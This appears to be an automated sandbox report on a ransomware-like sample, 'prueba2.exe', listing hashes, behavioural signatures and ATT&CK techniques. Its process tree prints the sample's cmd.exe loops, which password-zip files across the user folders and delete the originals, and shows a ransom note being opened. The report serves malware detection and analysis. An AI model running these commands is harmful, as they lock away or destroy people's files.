be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

General

Target

prueba2.exe
Size

329KB
MD5

9f5f9c71bb71b8e1571fc4d27721a99e
SHA1

e64de07b46d896d25dc059dd774a140f109364c3
SHA256

be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
SHA512

6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score

3^/10

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

Winword.exe

pid process

3728 Winword.exe
3728 Winword.exe

pid	process
3728	Winword.exe
3728	Winword.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe

Makes http(s) request 4 IoCs

Contacts server via http/https, possibly for C2 communication.

Processes:

description	flow	ioc
HTTP URL	10	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bc81c9a58595765
HTTP URL	12	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D
HTTP URL	24	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?aa85e948382930ed
HTTP URL	17	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

3916 NOTEPAD.EXE

pid	process
3916	NOTEPAD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

prueba2.exeOpenWith.exe

description	pid	process	target process
PID 4016 wrote to memory of 4088	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 4088	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 2280	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 2280	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3788	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3788	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3308	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3308	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3184	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3184	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3232	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3232	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3964	4016	prueba2.exe	cmd.exe
PID 4016 wrote to memory of 3964	4016	prueba2.exe	cmd.exe
PID 3364 wrote to memory of 3728	3364	OpenWith.exe	Winword.exe
PID 3364 wrote to memory of 3728	3364	OpenWith.exe	Winword.exe

Suspicious use of SetWindowsHookEx 35 IoCs

Processes:

OpenWith.exeWinword.exe

pid	process
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3364	OpenWith.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe
3728	Winword.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

3364 OpenWith.exe

Modifies registry class 2 IoCs

Processes:

cmd.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000_Classes\Local Settings	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 116 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	4044	7z.exe
Token: 35	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeRestorePrivilege	2624	7z.exe
Token: 35	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeSecurityPrivilege	2624	7z.exe
Token: SeRestorePrivilege	4092	7z.exe
Token: 35	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeSecurityPrivilege	4092	7z.exe
Token: SeRestorePrivilege	3688	7z.exe
Token: 35	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeSecurityPrivilege	3688	7z.exe
Token: SeRestorePrivilege	3764	7z.exe
Token: 35	3764	7z.exe
Token: SeSecurityPrivilege	3764	7z.exe
Token: SeSecurityPrivilege	3764	7z.exe
Token: SeRestorePrivilege	3184	7z.exe
Token: 35	3184	7z.exe
Token: SeSecurityPrivilege	3184	7z.exe
Token: SeSecurityPrivilege	3184	7z.exe
Token: SeRestorePrivilege	3204	7z.exe
Token: 35	3204	7z.exe
Token: SeSecurityPrivilege	3204	7z.exe
Token: SeSecurityPrivilege	3204	7z.exe
Token: SeRestorePrivilege	3428	7z.exe
Token: 35	3428	7z.exe
Token: SeSecurityPrivilege	3428	7z.exe
Token: SeSecurityPrivilege	3428	7z.exe
Token: SeRestorePrivilege	3728	7z.exe
Token: 35	3728	7z.exe
Token: SeSecurityPrivilege	3728	7z.exe
Token: SeSecurityPrivilege	3728	7z.exe
Token: SeRestorePrivilege	2592	7z.exe
Token: 35	2592	7z.exe
Token: SeSecurityPrivilege	2592	7z.exe
Token: SeSecurityPrivilege	2592	7z.exe
Token: SeRestorePrivilege	3844	7z.exe
Token: 35	3844	7z.exe
Token: SeSecurityPrivilege	3844	7z.exe
Token: SeSecurityPrivilege	3844	7z.exe
Token: SeRestorePrivilege	1656	7z.exe
Token: 35	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeRestorePrivilege	3916	7z.exe
Token: 35	3916	7z.exe
Token: SeSecurityPrivilege	3916	7z.exe
Token: SeSecurityPrivilege	3916	7z.exe
Token: SeRestorePrivilege	4028	7z.exe
Token: 35	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeRestorePrivilege	3900	7z.exe
Token: 35	3900	7z.exe
Token: SeSecurityPrivilege	3900	7z.exe
Token: SeSecurityPrivilege	3900	7z.exe
Token: SeRestorePrivilege	3780	7z.exe
Token: 35	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

NOTEPAD.EXE

pid process

3916 NOTEPAD.EXE

pid	process
3916	NOTEPAD.EXE

C:\Users\Admin\AppData\Local\Temp\prueba2.exe
"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:4088

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\BlockPop.docm.geminis3" "C:\Users\Admin\Documents\BlockPop.docm"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OpenStart.doc.geminis3" "C:\Users\Admin\Documents\OpenStart.doc"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\DebugNew.xlsm.geminis3" "C:\Users\Admin\Documents\DebugNew.xlsm"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\RemoveInitialize.xlsm.geminis3" "C:\Users\Admin\Documents\RemoveInitialize.xlsm"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\ResolveSplit.xls.geminis3" "C:\Users\Admin\Documents\ResolveSplit.xls"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\SearchResize.xlsb.geminis3" "C:\Users\Admin\Documents\SearchResize.xlsb"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\UpdateSearch.xlsb.geminis3" "C:\Users\Admin\Documents\UpdateSearch.xlsb"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OutProtect.ppt.geminis3" "C:\Users\Admin\Documents\OutProtect.ppt"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:2280

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\JoinStop.jpg.geminis3" "C:\Users\Admin\Pictures\JoinStop.jpg"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:3788

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnlockClose.jpeg.geminis3" "C:\Users\Admin\Downloads\UnlockClose.jpeg"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnblockSelect.doc.geminis3" "C:\Users\Admin\Downloads\UnblockSelect.doc"
3⤵
PID:3752

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ApproveConfirm.xlsm.geminis3" "C:\Users\Admin\Downloads\ApproveConfirm.xlsm"
3⤵
PID:4044

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResizeConvertTo.xls.geminis3" "C:\Users\Admin\Downloads\ResizeConvertTo.xls"
3⤵
PID:2624

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\InitializeSelect.pptx.geminis3" "C:\Users\Admin\Downloads\InitializeSelect.pptx"
3⤵
PID:4092

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResolveReset.png.geminis3" "C:\Users\Admin\Downloads\ResolveReset.png"
3⤵
PID:3688

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ExportExpand.mp4.geminis3" "C:\Users\Admin\Downloads\ExportExpand.mp4"
3⤵
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:3308

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConfirmRequest.png.geminis3" "C:\Users\Admin\Music\ConfirmRequest.png"
3⤵
PID:3200

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConvertToWatch.png.geminis3" "C:\Users\Admin\Music\ConvertToWatch.png"
3⤵
PID:3364

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\SkipDisable.png.geminis3" "C:\Users\Admin\Music\SkipDisable.png"
3⤵
PID:3324

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\RemoveStep.rar.geminis3" "C:\Users\Admin\Music\RemoveStep.rar"
3⤵
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
2⤵
PID:3232

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\ReceiveConnect.docx.geminis3" "C:\Users\Admin\Desktop\ReceiveConnect.docx"
3⤵
PID:3168

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\GetConvertFrom.png.geminis3" "C:\Users\Admin\Desktop\GetConvertFrom.png"
3⤵
PID:2644

C:\PROGRA~1\7-ZIP\7z.exe
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\InstallSync.txt.geminis3" "C:\Users\Admin\Desktop\InstallSync.txt"
3⤵
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start README.txt
2⤵
- Modifies registry class
PID:3964

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
3⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:3916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3776

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: GetForegroundWindowSpam
- Modifies registry class
PID:3364

C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Documents\BlockPop.docm.geminis3"
2⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3728

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\README.txt

Download Submit
C:\Users\Admin\Documents\BlockPop.docm.geminis3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads